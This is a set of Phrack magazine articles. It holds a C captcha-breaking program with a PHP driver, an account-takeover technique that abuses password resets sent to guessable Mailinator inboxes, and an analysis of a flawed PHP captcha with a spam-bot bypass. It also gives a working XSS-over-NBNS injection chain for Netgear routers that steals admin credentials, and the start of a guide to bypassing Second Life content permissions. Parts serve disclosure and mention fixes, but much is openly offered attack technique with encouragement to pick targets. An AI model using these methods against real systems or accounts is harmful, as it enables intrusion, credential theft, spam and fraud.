for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td+=2;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td=d-1;
|
|
ti=i+1;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
if (t<__MIN)
|
|
for (k=0;k<3;k++)
|
|
captcha[i][d][k]=255;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
void make_bw () {
|
|
int i,d;
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
if (captcha[i][d][0]!=255)
|
|
bw[i][d]=1;
|
|
else
|
|
bw[i][d]=0;
|
|
}
|
|
|
|
void scan () {
|
|
int i,d,k,j,c,coord[6][2][2];
|
|
for (d=0,j=0,c=0;d<120;d++) {
|
|
for (i=0,k=0;i<40;i++)
|
|
if (bw[i][d])
|
|
k=1;
|
|
if (k && !j) {
|
|
j=1;
|
|
coord[c][0][0]=d;
|
|
}
|
|
else if (!k && j) {
|
|
j=0;
|
|
coord[c++][0][1]=d;
|
|
}
|
|
}
|
|
for (c=0;c<6;c++) {
|
|
coord[c][1][0]=-1;
|
|
coord[c][1][1]=-1;
|
|
for (i=0;(i<40 && coord[c][1][0]==-1);i++)
|
|
for (d=coord[c][0][0];d<coord[c][0][1];d++)
|
|
if (bw[i][d]) {
|
|
coord[c][1][0]=i;
|
|
break;
|
|
}
|
|
for (i=39;(i>=0 && coord[c][1][1]==-1);i--)
|
|
for (d=coord[c][0][0];d<coord[c][0][1];d++)
|
|
if (bw[i][d]) {
|
|
coord[c][1][1]=i;
|
|
break;
|
|
}
|
|
for (i=coord[c][1][0],j=0;i<=coord[c][1][1];i++,j++)
|
|
for (d=coord[c][0][0],k=0;d<coord[c][0][1];d++,k++)
|
|
chars[c][j][k]=bw[i][d];
|
|
dim[c][0]=j;
|
|
dim[c][1]=k;
|
|
}
|
|
}
|
|
|
|
void read_pixels (int c) {
|
|
int i,d,k,r;
|
|
float arr[]={4,2,1.333333,1};
|
|
memset (bpix,0,8*sizeof(int));
|
|
for (k=0,i=0;k<4;k++) {
|
|
for (;i<(int)(dim[c][0]/arr[k]);i++) {
|
|
for (d=0;d<(int)(dim[c][1]/2);d++)
|
|
bpix[k][0] += chars[c][i][d];
|
|
for (;d<dim[c][1];d++)
|
|
bpix[k][1] += chars[c][i][d];
|
|
}
|
|
}
|
|
}
|
|
|
|
char cmp (int c) {
|
|
int i,d;
|
|
int err,n,min,min_i;
|
|
read_pixels (c);
|
|
for (i=0,min=-1;i<28;i++) {
|
|
n=abs(heights[i]-dim[c][0])*__HGT;
|
|
for (d=0;d<4;d++) {
|
|
n += abs(bpix[d][0]-table[i][0][d]);
|
|
n += abs(bpix[d][1]-table[i][1][d]);
|
|
}
|
|
if (min>n || min<0) {
|
|
min=n;
|
|
min_i = i;
|
|
}
|
|
}
|
|
return ch_list[min_i];
|
|
}
|
|
|
|
char *read_captcha (char *file) {
|
|
char *str;
|
|
int i;
|
|
str = malloc(7*sizeof(char));
|
|
load_image (file);
|
|
clear_noise ();
|
|
make_bw ();
|
|
scan ();
|
|
for (i=0;i<6;i++)
|
|
str[i]=cmp(i);
|
|
str[i]=0;
|
|
return str;
|
|
}
|
|
|
|
int main (int argc, char *argv[]) {
|
|
printf ("%s\n",read_captcha ("test.ppm"));
|
|
return 0;
|
|
}
|
|
|
|
Oh, if you want to have some fun and the staff is so kind as to leave
|
|
captcha.php (now captcha_old.php) you can run this PHP script:
|
|
|
|
<?
|
|
file_put_contents ("a.jpg",file_get_contents
|
|
("http://www.phrack.com/captcha_old.php"));
|
|
system ("convert -compress None a.jpg test.ppm");
|
|
system ("./captcha");
|
|
?>
|
|
|
|
I'm done, thanks for reading :)!
|
|
|
|
darkjoker - darkjoker93 _at_ gmail.com
|
|
|
|
|
|
|=[ 0x02 ]=---=[ The Dangers of Anonymous Email - DangerMouse ]=---------=|
|
|
|
|
|
|
In this digital world of online banking, and cyber relationships there
|
|
exists an epidemic. This is known simply as SPAM.
|
|
The war on spam has been costly, with casualties on both sides. However
|
|
finally mankind has developed the ultimate weapon to win the war...
|
|
email anonymizers!
|
|
|
|
Ok, so maybe this was a bit dramatic, but the truth is people are
|
|
getting desperate to rid themselves of the gigantic volumes of
|
|
unsolicited email which plagues their inbox daily. To combat this problem
|
|
many internet users are turning to email anonymizing services such as
|
|
Mailinator [1].
|
|
|
|
Sites like mailinator.com provide a domain where any keyword can be
|
|
created and appended as the username portion of an email address.
|
|
So for example, if you were to choose the username "trustno1", the email
|
|
address trustno1@mailinator.com could be used. Then the mailbox can be
|
|
accessed without a password at http://trustno1.mailinator.com. There is
|
|
no registration required to do this, and the email address can be created
|
|
at a whim. Obviously this can be used for a number of things. From a
|
|
hackers perspective, it can be very useful to quickly create an anonymous
|
|
email address whenever one is needed. Especially one which can be checked
|
|
easily via a chain of proxies. Hell, combine it with an anonymous visa
|
|
gift card, and you've practically got a new identity.
|
|
|
|
For your typical spam adverse user, this can be an easy way to avoid
|
|
dealing with spam. One of the easiest ways to quickly gain an inbox
|
|
soaked in spam is to use your real email address to sign up to every
|
|
shiney new website which tickles your fancy. By creating a mailinator
|
|
account and submitting that instead, the user can visit the mailinator
|
|
website to retrieve the sign up email. Since this is not the users
|
|
regular email account, any spam sent to it is inconsequential.
|
|
|
|
The flaw with this however, is that your typical user just isn't
|
|
creative enough to work with a system designed this way. When creating
|
|
a fresh anonymous email account for a new website a typical users
|
|
thought process goes something like this:
|
|
|
|
a) Look up at URL for name of site
|
|
b) Append said name to mailinator domain
|
|
c) ???
|
|
d) Profit
|
|
|
|
This opens up a nice way for the internet's more shady characters to
|
|
quickly gain access to almost any popular website via the commonly
|
|
implemented "password reset" functionality.
|
|
|
|
But wait, you say. Surely you jest? No one could be capable of such
|
|
silly behavior on the internet!
|
|
|
|
Alas... Apparenly Mike & Debra could.
|
|
|
|
"An email with instructions on how to access Your Account has been sent to
|
|
you at netflix@mailinator.com"
|
|
|
|
"Netflix password request
|
|
|
|
"Dear Mike & Debra,
|
|
We understand you'd like to change your password. Just click here and
|
|
follow the prompts. And don't forget your password is case sensitive."
|
|
|
|
;) ?
|
|
|
|
At least security folk would be immune to this you say! There's no way
|
|
that gmail@mailinator.com would allow one to reset 2600LA's mailing list
|
|
password...
|
|
|
|
As you can imagine it's easy to wile away some time with possible
|
|
targets ranging from popular MMO's to banking websites. Just make sure
|
|
you use a proxy so you don't have to phone them up and give them their
|
|
password back... *cough*
|
|
|
|
Have fun! ;)
|
|
|
|
--DangerMouse <Phrack@mailinator.com>
|
|
|
|
P.S. With the rise in the popularity of social networking websites
|
|
mailinator felt the need to go all web 2.0 by including a fancy list of
|
|
people who "Like" mailinator on Facebook. AKA a handy target list for a
|
|
bored individual with scripting skillz.
|
|
|
|
References:
|
|
[1] Mailinator: http://www.mailinator.com
|
|
[2] Netflix: http://www.netflix.com
|
|
|
|
|
|
|=[ 0x03 ]=---=[ Captchas Round 2 - phpc0derZ@phrack.org ]=--------------=|
|
|
|
|
[ Or why we suck even more ;> ]
|
|
|
|
Let's face it, our lazyness got us ;-) So what's the story behind our
|
|
captcha? Ironically enough, the original script is coming from this URL:
|
|
|
|
http://www.white-hat-web-design.co.uk/articles/php-captcha.php <-- :)))))))
|
|
|
|
8<----------------------------------------------------------------------->8
|
|
<?php
|
|
session_start();
|
|
|
|
/*
|
|
* File: CaptchaSecurityImages.php
|
|
* Author: Simon Jarvis
|
|
* Copyright: 2006 Simon Jarvis
|
|
* Date: 03/08/06
|
|
* Updated: 07/02/07
|
|
* Requirements: PHP 4/5 with GD and FreeType libraries
|
|
* Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php
|
|
*
|
|
* This program is free software; you can redistribute it and/or
|
|
* modify it under the terms of the GNU General Public License
|
|
* as published by the Free Software Foundation; either version 2
|
|
* of the License, or (at your option) any later version.
|
|
*
|
|
* This program is distributed in the hope that it will be useful,
|
|
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
* GNU General Public License for more details:
|
|
* http://www.gnu.org/licenses/gpl.html
|
|
*
|
|
*/
|
|
|
|
|
|
class CaptchaSecurityImages {
|
|
|
|
var $font = 'monofont.ttf';
|
|
|
|
function generateCode($characters)
|
|
{
|
|
/* list all possible characters, similar looking characters and
|
|
* vowels have been removed */
|
|
$possible = '23456789bcdfghjkmnpqrstvwxyz'; $code = ''; $i = 0;
|
|
while ($i < $characters) {
|
|
$code .= substr($possible, mt_rand(0, strlen($possible)-1),1);
|
|
$i++;
|
|
}
|
|
return $code;
|
|
}
|
|
|
|
function CaptchaSecurityImages(
|
|
$width='120',
|
|
$height='40',
|
|
$characters='6')
|
|
{
|
|
$code = $this->generateCode($characters);
|
|
/* font size will be 75% of the image height */
|
|
$font_size = $height * 0.75;
|
|
$image = imagecreate($width, $height)
|
|
or die('Cannot initialize new GD image stream');
|
|
/* set the colours */
|
|
$background_color = imagecolorallocate($image, 255, 255, 255);
|
|
$text_color = imagecolorallocate($image, 20, 40, 100);
|
|
$noise_color = imagecolorallocate($image, 100, 120, 180);
|
|
/* generate random dots in background */
|
|
for( $i=0; $i<($width*$height)/3; $i++ ) {
|
|
imagefilledellipse($image,
|
|
mt_rand(0,$width),
|
|
mt_rand(0,$height),
|
|
1,
|
|
1,
|
|
$noise_color);
|
|
}
|
|
/* generate random lines in background */
|
|
for( $i=0; $i<($width*$height)/150; $i++ ) {
|
|
imageline($image,
|
|
mt_rand(0,$width),
|
|
mt_rand(0,$height),
|
|
mt_rand(0,$width),
|
|
mt_rand(0,$height),
|
|
$noise_color);
|
|
}
|
|
/* create textbox and add text */
|
|
$textbox = imagettfbbox($font_size,
|
|
0,
|
|
$this->font,
|
|
$code)
|
|
or die('Error in imagettfbbox function');
|
|
$x = ($width - $textbox[4])/2;
|
|
$y = ($height - $textbox[5])/2;
|
|
imagettftext($image,
|
|
$font_size,
|
|
0,
|
|
$x,
|
|
$y,
|
|
$text_color,
|
|
$this->font ,
|
|
$code)
|
|
or die('Error in imagettftext function');
|
|
/* output captcha image to browser */
|
|
header('Content-Type: image/jpeg');
|
|
imagejpeg($image);
|
|
imagedestroy($image);
|
|
$_SESSION['security_code'] = $code;
|
|
}
|
|
|
|
}
|
|
|
|
$width = isset($_GET['width']) && $_GET['width']<600?$_GET['width']:'120';
|
|
$height = isset($_GET['height'])&&$_GET['height']<200?$_GET['height']:'40';
|
|
$characters = isset($_GET['characters'])
|
|
&& $_GET['characters']>2?$_GET['characters']:'6';
|
|
|
|
$captcha = new CaptchaSecurityImages($width,$height,$characters);
|
|
|
|
?>
|
|
8<----------------------------------------------------------------------->8
|
|
|
|
The reason why this particular script was chosen was lost in the mist of
|
|
time so let's focus instead on the code:
|
|
|
|
----[ 1 - Oops
|
|
|
|
OK so darkangel was right, the script is *really* poorly designed:
|
|
-> The set of possible characters is limited to 28 characters
|
|
-> The characters are inserted in the image using imagettfbbox()
|
|
with (amongst other things) a fixed $font_size, a predictable
|
|
position, etc.
|
|
-> The noise itself is generated using lines and circles of the
|
|
same color ($noise_color) which makes it trivial to remove.
|
|
|
|
Ok so we knew that it was crappy but there is even more. darkjoker's
|
|
approach can be seen as a dictionnary attack applied when the noise has
|
|
been removed. There is much more simple: since the characters are not
|
|
distorded, we can easily recover them using an OCR software. Luckily there
|
|
exists a GNU one: gocr. We tested it against the imagettfbbox() function
|
|
and without surprise ... it worked.
|
|
|
|
Hey man, it wasn't worth to spend that much time :>
|
|
|
|
----[ 2 - Oops (bis)
|
|
|
|
We located two interested things in the script and if you're a proficient
|
|
PHP reader then you've probably noticed them too... ;-)
|
|
|
|
a) The number of characters inserted in the image is user controlled.
|
|
If an attacker calls http://phrack.org/captcha.php?characters=x then
|
|
he can generate a captcha with X characters ( x >= 2 ). This
|
|
shouldn't be an issue itself since captcha.php is called by the
|
|
server. However it is because...
|
|
|
|
b) The script includes an interesting line:
|
|
$_SESSION['security_code'] = $code;
|
|
This clearly means that the PHP session will only keep track of
|
|
the *last* $code. While this is a normal behavior (some captcha
|
|
aren't readable at all so the user must be allowed to refresh),
|
|
this will be at our advantage.
|
|
|
|
This gives us the opportunity to mount a new attack:
|
|
-> I'm a spam bot and I'm writing some shit comment about how big &
|
|
hard your penis will be when you will purchase my special pills. A
|
|
PHP session is created.
|
|
-> A captcha is loaded and because I'm a bot I can't fucking read it.
|
|
Too bad for me.
|
|
-> Within the same session I call captcha.php with ?characters=2.
|
|
With a probability of 1/(28*28) I will be able to predict the
|
|
code generated. I'll try as many times as required until I'm right.
|
|
-> I will most likely succeed in the end and some poor desperate guy
|
|
may purchase the pills.
|
|
|
|
We've changed the captcha mechanism, the old one being captcha_old.php
|
|
|
|
----[ 3 - Conclusion
|
|
|
|
Who knows if spammers are reading phrack? One thing is sure: the script is
|
|
very present on Internet... Yes you should patch xD
|
|
|
|
|
|
|=[ 0x04 ]=---=[ XSS Using NBNS on a Home Router - Simon Weber ]=--------=|
|
|
|
|
|
|
--[ code is appended, but may not be the most recent. check:
|
|
https://github.com/simon-weber/XSS-over-NBNS
|
|
for the most recent version. ]--
|
|
|
|
--[ Contents
|
|
|
|
1 - Abstract
|
|
|
|
2 - Test Device Background
|
|
|
|
3 - Injection Chaining Technique
|
|
|
|
4 - Device Specific Exploits
|
|
4.1 - Steal Router Admin Credentials
|
|
4.2 - Hide a Device on the Network
|
|
|
|
5 - Tool
|
|
|
|
6 - Fix, Detection and Prevention
|
|
|
|
7 - Applications
|
|
|
|
8 - References
|
|
|
|
|
|
--[ 1 - Abstract
|
|
|
|
For routers which:
|
|
|
|
1) use NBNS to identify attached devices
|
|
2) list these devices on their web admin interface
|
|
3) do not sanitize the names they receive
|
|
|
|
there exists a 15 character injection vector on the web interface. This
|
|
vector can be exploited by anyone on the network, and will affect anyone
|
|
who visits a specific page on the web administration interface. Using
|
|
multiple injections in sequence separated with block comments, it is
|
|
possible to chain these injections to create a payload of arbitrary length.
|
|
This can be used to gain router admin credentials, steal cookies from an
|
|
admin, alter the view of attached devices, or perform any other XSS attack.
|
|
|
|
The real world application of the technique is limited by how often admins
|
|
are on the web interface. However, coupled with some social engineering,
|
|
small businesses such as coffee shops may be vulnerable.
|
|
|
|
--[ 2 - Test Device Background
|
|
|
|
I got a Netgear wgr614 v5 for less than $15 shipped on eBay. This is a
|
|
common home wireless B/G router. Originally released in 2004, its EOL was
|
|
about 5 years ago [1].
|
|
|
|
The web admin interface is pretty poorly built (sorry, Netgear!). If you
|
|
poke around, you'll find a lot of unescaped input fields to play with.
|
|
However, none of them can really be used to do anything interesting -
|
|
they're one time injection vectors that other users won't see.
|
|
|
|
However, there is one interesting page. This is the "attached devices" page
|
|
(DEV_devices.htm). It shows a table of what's connected to the router, and
|
|
looks something like this:
|
|
|
|
# Name IP MAC
|
|
1 computer_1 192.168.1.2 07:E0:17:8F:11:2F
|
|
2 computer_2 192.168.1.11 AF:3C:07:4D:B0:3A
|
|
3 -- 192.168.1.15 EB:3C:76:0F:67:43
|
|
|
|
This table is generated from the routing table, and the name is filled in
|
|
from NBNS responses to router requests. If a machine doesn't respond to
|
|
NBNS, takes too long to respond, or it gives an invalid name (over 15
|
|
characters or improperly terminated), the name is set to "--". The table is
|
|
refreshed in two ways: automatically by the router at an interval, and by a
|
|
user visiting or refreshing the page.
|
|
|
|
A quick test showed that the name in this table was unescaped. However,
|
|
this only gets us 15 characters of payload. I couldn't manage to squeeze a
|
|
reference to external code in just 15 characters (maybe someone else can?).
|
|
Executing arbitrary code will require something a bit more sophisticated.
|
|
|
|
--[ 3 - Injection Chaining Technique
|
|
|
|
The obvious way to get more characters for the payload is by chaining
|
|
together multiple injections. To do this, we need a few things:
|
|
|
|
1) A way to make multiple entries in the table:
|
|
This is easy, we just send out fake responses for IP/MAC
|
|
combinations that don't already exist on the network.
|
|
|
|
2) A way to control the order of our entries:
|
|
Also easy: the table orders by IP address. We'll just use a
|
|
range of incremental addresses that no one else is using.
|
|
|
|
3) A way to chain our entries around the other html:
|
|
Block comments will work for this. Our injections will just open
|
|
and close block comments at the end and beginning of their
|
|
reported names. For an illustration, imagine anything between <>
|
|
will be ignored on the page, and our name injections are
|
|
delimited with single quotes:
|
|
|
|
'[name 1] <' [ignored stuff]
|
|
[ignored stuff] '> [name 2] <' [ignored stuff]
|
|
... '> [name 3] <' ...
|
|
|
|
Great, that was easy. What kind of block comments can we use? How about
|
|
html's?. This could work, but it has limitations. First off, -- or >
|
|
anywhere in the commented out html will break things. Even if this did
|
|
work, we'd have to be careful about where we split things, and the comments
|
|
would take up about half of a 15 char name.
|
|
|
|
Javascript's c-style block comments are smaller and more flexible. They can
|
|
come anywhere in code, so long as it isn't the middle of a token. For
|
|
example,
|
|
|
|
document/* ignored */.write("something")
|
|
|
|
is fine, while
|
|
|
|
docu/* uh oh */ment.write("something")
|
|
|
|
breaks things.
|
|
|
|
We also just need to avoid */ in the commented out html, which should be
|
|
much less likely to pop up than >. To use javascript block comments, we'll
|
|
obviously need to use javascript to get our payload onto the page. Call it
|
|
our "payload transporter". This will work just fine:
|
|
|
|
"<script>document.write('[payload]');</script>"
|
|
|
|
So, then, the first thing to do is fit our transporter into 15 char chunks
|
|
to send as our first few fake NBNS names. Being careful not to split tokens
|
|
with comments, our first 3 names can be:
|
|
|
|
<script>/*
|
|
*/document./*
|
|
*/write(/*
|
|
|
|
This will open the write command to inject our payload. Now we need to
|
|
package the payload into the transporter in some more 15 char chunks. Since
|
|
strings are tokens, we can't split one big string with block comments. We
|
|
need to split up the payload into multiple strings and introduce more
|
|
tokens between them. To do this, I leveraged the fact that document.write
|
|
can take multiple arguments, which it will write in order - the commas that
|
|
split parameters will be our extra tokens. String concatenation would work,
|
|
too. So, our payload will be packaged into the transporter like:
|
|
|
|
'first part of payload', /*
|
|
*/ 'second part of payload', /*
|
|
*/ 'third part...', /*
|
|
...
|
|
*/ ,'last part'); /*
|
|
|
|
It's easy to control the length of the strings to fit into the 15 char
|
|
length (we've just got to be careful about quotes in our payload). Lastly,
|
|
we just need to close the script tag, and we're done. We now have a way to
|
|
write an arbitrary length payload onto the attached devices page. Putting
|
|
it all together, here's an example of what our series of fake NBNS
|
|
responses could be if we wanted to get '<script>alert("test");</script>'
|
|
onto the page:
|
|
|
|
Spoofed NBNS Name IP MAC
|
|
<script>/* 192.168.1.111 00:00:00:00:00:01
|
|
*/document./* 192.168.1.112 00:00:00:00:00:02
|
|
*/write(/* 192.168.1.113 00:00:00:00:00:03
|
|
*/'<script>',/* 192.168.1.114 00:00:00:00:00:04
|
|
*/'alert(\'',/* 192.168.1.115 00:00:00:00:00:05
|
|
*/'test\');',/* 192.168.1.116 00:00:00:00:00:06
|
|
*/'</script',/* 192.168.1.117 00:00:00:00:00:07
|
|
*/'>');/* 192.168.1.118 00:00:00:00:00:08
|
|
*/</script> 192.168.1.119 00:00:00:00:00:09
|
|
|
|
There are a few other practical considerations that I found while working
|
|
with my specific Netgear router. It will use the most recent information it
|
|
has for device names. This means that we have to send our payload every
|
|
time that requests are sent out. It also means that for some time after we
|
|
stop injecting, the device listing is going to have a number of '--'
|
|
entries; the router is expecting to get names for these devices but sees no
|
|
response. To hide our tracks, we could reboot the router when finished
|
|
(this is possible by either injection or after stealing admin credentials,
|
|
which is detailed below).
|
|
|
|
We also have to be careful that a legitimate device doesn't come on to the
|
|
network with one of our spoofed IPs or MACs. This could possibly break our
|
|
injection, depending on the timing of responses.
|
|
|
|
One last thing to keep in mind: the NBNS packets need to get on the wire
|
|
quickly, since the router only listens for NBNS responses for a short time.
|
|
Thus, smaller payloads (which fit into less packets) are more likely to
|
|
succeed. You'll want to create external javascript to do any heavy lifting,
|
|
and just inject code to run it. When a payload fails, earlier packets will
|
|
get there and others won't, leaving garbage in the attached devices list.
|
|
|
|
--[ 4 - Device Specific Exploits
|
|
|
|
Naturally, anything that can be done with XSS or javascript is fair game.
|
|
You can attack the user (cookie stealing), the router (injected requests to
|
|
the web interface are now authed), or the page itself. I created a few
|
|
interesting examples that are specific to the Netgear device I had.
|
|
|
|
------[ 4.1 - Steal Router Admin Credentials
|
|
|
|
On the admin interface, there is an option to backup and restore the router
|
|
settings. It generates a simple flat file database called netgear.cfg. This
|
|
file itself is actually rather interesting. It seems to be a plaintext
|
|
memory dump, guarded from manipulation by a checksum that I couldn't figure
|
|
out (no one has cracked it as of the time this was written - if you do, let
|
|
me know). In it, you'll find everything from wireless keys to static routes
|
|
to - surprise - plaintext administrator information. This includes
|
|
usernames and passwords for both the http admin and telnet super admin (see
|
|
[3] for information on the hidden telnet console).
|
|
|
|
It's easy to steal this file via XSS in the same way that cookies are
|
|
stolen. The attacker first sets up a listening http server to receive the
|
|
information. Then, the injection code simply GETs the file and sends it off
|
|
to the listening server.
|
|
|
|
With admin access to the router, the attacker can do all sorts of things.
|
|
Basic traffic logging is built-in, and can even be emailed out
|
|
automatically. DoS is possible through the router's website blocking
|
|
functions. Man in the middle attacks are possible through the exposed dhcp
|
|
dns, static routing and internet connection configuration options.
|
|
|
|
------[ 4.2 - Hide a Device on the Network
|
|
|
|
The only place that an admin can get information about who is on the
|
|
network is right on the page we inject to. Manipulating the way the device
|
|
list is displayed could provide simple counter-detection against a
|
|
suspicious administrator.
|
|
|
|
For this exploit, we inject javascript to iterate through the table and
|
|
remove any row that matches a device we're interested in. Then, the table
|
|
is renumbered. Note that we don't have to own the device to remove it from
|
|
the list.
|
|
|
|
Going one step further, the attacker can bolster the cloak of invisibility.
|
|
Blocking connections not originating from the router is an obvious choice.
|
|
It might be wise to block pings directly from the router as well.
|
|
|
|
--[ 5 - Tool
|
|
|
|
I used Scapy with Python to implement the technique and exploits described
|
|
above and hosted it on Github [2]. You can also specify a custom exploit
|
|
that will be packaged and sent using my chaining technique. I also made a
|
|
simple python http server to listen for stolen admin credentials and serve
|
|
up external exploit code. Credit goes to Robert Wesley McGrew for NBNSpoof;
|
|
I reused some of his code [4].
|
|
|
|
To combat the problem I described earlier about sending packets quickly, I
|
|
listen for the first request from the router and precompute the response
|
|
packets to send. These will be sent as responses to any other requests
|
|
sniffed. You'll notice this if you use my tool; a "ready to inject" message
|
|
will be printed after the responses are generated.
|
|
|
|
If you look at my built-in exploits, you'll see they each use a loadhelp2
|
|
function as the entry point. This is just an easy way to get them to run
|
|
when the page is loaded. The router declares the loadhelp function
|
|
externally, and runs it on page load; I declare it on the page (so my
|
|
version is actually used), and use it to launch my external loadhelp2 code.
|
|
Then, the original code is patched on to the end, so the user doesn't
|
|
notice.
|
|
|
|
--[ 6 - Fix, Detection and Prevention
|
|
|
|
To close the hole, Netgear would only need to change some web backend code
|
|
in the firmware to escape NBNS names. I contacted Netgear about this. They
|
|
won't make a fix for this specific model - it already saw its support EOL -
|
|
but they are checking their newer models for this flaw as of September 2011
|
|
[1].
|
|
|
|
So, if you have this router, know that a fix isn't coming. While it may be
|
|
difficult to initially detect that a device you own is being attacked, once
|
|
you suspect it there are simple ways to verify it:
|
|
|
|
check the source of the affected page; you'll see the commented
|
|
out device entries with suspicious names
|
|
|
|
use the hidden telnet interface. This will show the many fake
|
|
IPs that are generated when packing a payload.
|
|
|
|
as a last resort, watch network traffic for malformed NBNS names
|
|
|
|
Also, keep in mind that you can only be affected when checking your
|
|
router's configuration. You could protect yourself completely by never
|
|
visiting the web administration interface.
|
|
|
|
--[ 7 - Applications
|
|
|
|
Of course, this technique's practical application is limited to how often
|
|
users check their router admin pages. However, when coupled with some
|
|
social engineering, I could imagine a vulnerability for small businesses
|
|
like coffee shops.
|
|
|
|
These locations commonly offer wireless using off-the-shelf hardware like
|
|
my Netgear router. Getting on their network is easy - it's already open. At
|
|
this point, the attacker starts the exploit, then convinces an employee to
|
|
check the admin pages (maybe "I'm having some strange issues with the
|
|
wireless...Can you check on the router and see if my device is showing
|
|
up?"). I'm sure a practiced social engineer would have no trouble pulling
|
|
this off.
|
|
|
|
As far as applying this beyond the home networking realm, a good place to
|
|
start would be investigating this technique on other routers or better
|
|
firmwares like DD-WRT or Tomato. That would at least determine if this is a
|
|
common flaw. I didn't have another device to play with (the wgr614v5
|
|
doesn't work with other firmware), so I'll leave it for someone else to
|
|
try.
|
|
|
|
I'm doubtful that other applications very different from what I described
|
|
exist. Router administration pages simply aren't viewed very much. However,
|
|
the broader idea of XSS through spoofed NBNS names might be applicable to a
|
|
different domain. Anywhere there is a listing of NBNS names, there is the
|
|
possibility of an injection vector.
|
|
|
|
--[ 8 - References
|
|
|
|
[1] private communication with Netgear, September 2011
|
|
[2] https://github.com/simon-weber/XSS-over-NBNS
|
|
[3] http://www.seattlewireless.net/NetgearWGR614#TelnetConsole
|
|
[4] http://www.mcgrewsecurity.com/tools/nbnspoof/
|
|
|
|
|
|
October 2011
|
|
Simon Weber
|
|
sweb090 _at_ gmail.com
|
|
|
|
|
|
|
|
|=[ 0x05 ]=---=[ Hacking the Second Life Viewer For Fun & Profit - Eva ]-=|
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ 01110010011000010110 ]=---------------------=|
|
|
|=------------------------=[ 01100110010101101110 ]=---------------------=|
|
|
|=------------------------=[ 10010110111001110011 ]=---------------------=|
|
|
|=------------------------=[ 01110011011001010111 ]=---------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
Index
|
|
|
|
------[ N. Preamble
|
|
------[ I. Part I - Objects
|
|
------[ II. Part II - Textures
|
|
II. i. Textures - GLIntercept
|
|
------[ III. Postamble
|
|
------[ B. Bibliography
|
|
------[ A. Appendix
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
------[ N. Preamble
|
|
|
|
Second Life [1] is a virtual universe created by Linden Labs [2] which
|
|
allows custom content to be created by uploading different file formats. It
|
|
secures that content with a permission mask "Modify / Copy / Transfer",
|
|
which allows creators to protect their objects from being modified, copied
|
|
or transferred from avatar to avatar. The standard viewer at the time of
|
|
this writing is 2.x but the 1.x old codebase is still around and it is
|
|
still the most wide-spread one. Then, we have third party viewers, and
|
|
those are viewers forked off the 1.x codebase and then "extended" to modify
|
|
the UI and add features for convenience.
|
|
|
|
Second Life works on the principle of separately isolated servers called
|
|
SIMs (from, simulator, now recently renamed to "Regions") which are
|
|
interconnected to form grids. The reasoning is that, if one SIM goes down,
|
|
it will become unavailable but it will not take down the entire grid. A
|
|
grid is just a collection of individual SIMs (regions) bunched together.
|
|
|
|
Avatars are players that connect to the grid using a viewer and navigate
|
|
the SIMs by "teleporting" from one SIM to the other. Technically, that
|
|
just means that the viewer is instructed to connect to the address of a
|
|
different SIM.
|
|
|
|
A viewer is really just a Linden version of a web browser (literally) which
|
|
relies on loads of Open Source software to run. It renders the textures
|
|
around you by transferring them from an asset server. The asset server is
|
|
just a container that stores all the content users upload onto Second Life.
|
|
Whenever you connect to a SIM, all the content around you gets transferred
|
|
to your viewer, just like surfing a website.
|
|
|
|
There are a few content types in Second Life that can be uploaded by users:
|
|
|
|
1.) Images
|
|
2.) Sounds
|
|
3.) Animations
|
|
|
|
Whenever I talk about "textures", I am talking about the images that users
|
|
have uploaded onto Second Life. In order to upload one of them onto Second
|
|
Life, you have to pay 10 Linden dollars. Linden maintains a currency
|
|
exchange from Linden dollars to real dollars.
|
|
|
|
At any point, depending on the build permission of the SIM you are
|
|
currently on, you are able to create objects. Those are just basic
|
|
geometric shapes called primitives, (or prims for short) such as cubes,
|
|
spheres, prisms, etc... After you created a primitive, you can decorate
|
|
it with images or use the Linden Scripting Language LSL [3] to trigger
|
|
the sounds you uploaded or animate avatars like yourself. There is a lot
|
|
to say about LSL, but it exceeds the scope of the article. You can also
|
|
link several such primitives together to form a link set which, in turn,
|
|
is called an object. (LISP fans dig in, Second Life is all about lists -
|
|
everything is a list.)
|
|
|
|
Coming back to avatars, your avatar has so called attachment-points which
|
|
allow you to attach such an object to yourself. Users create content, such
|
|
as hats, skirts, and so on and they sell them to you and you attach them to
|
|
these attachment points.
|
|
|
|
In addition to that, there are such things called wearables. Those are
|
|
different from attachments because they are not made up of objects but they
|
|
are rather simple textures that you apply to yourself. Those do not have
|
|
any geometric properties in-world and function on the principle of layers,
|
|
hiding the layer underneath. Finally, you have body parts which are also
|
|
just textures. For example, eyes, your skin.
|
|
|
|
The wearable layers get superimposed (baked) on you. For example, if you
|
|
wear a skin and a T-shirt, the T-shirt texture will hide part of the skin
|
|
texture underneath it.
|
|
|
|
We are going to take a standard viewer: we will use the Imprudence [4]
|
|
viewer, the current git version of which has such an export feature and we
|
|
are going to modify it so it will allow exports of any in-world object.
|
|
Later on, the usage of GLIntercept [7] will be mentioned since it can be
|
|
used to export the wearables and the body parts mentioned which are just
|
|
textures.
|
|
|
|
Why does this work? There are a number of restrictions which are enforced
|
|
by the server, and a number of actions that the server cannot control. For
|
|
example, every action you trigger in Second Life usually gets a permission
|
|
check with the SIM you are triggering the action on. Your viewer interprets
|
|
the response from the SIM and if it is given the green light, your viewer
|
|
goes ahead and performs the action you requested.
|
|
|
|
Say, for example, that the viewer does not care whether the SIM approves it
|
|
or not and just goes ahead and does it anyway. Will that work? It depends
|
|
whether the SIM checks again. Some viewers have a feature called "Enable
|
|
always fly.", which allows you to fly around in no-fly zones which is an
|
|
instance of the problem. The SIM hints the viewer that it is a no-fly zone,
|
|
however the viewer ignores it and allows you to fly regardless.
|
|
|
|
Every avatar is independent in this aspect and protected from other avatars
|
|
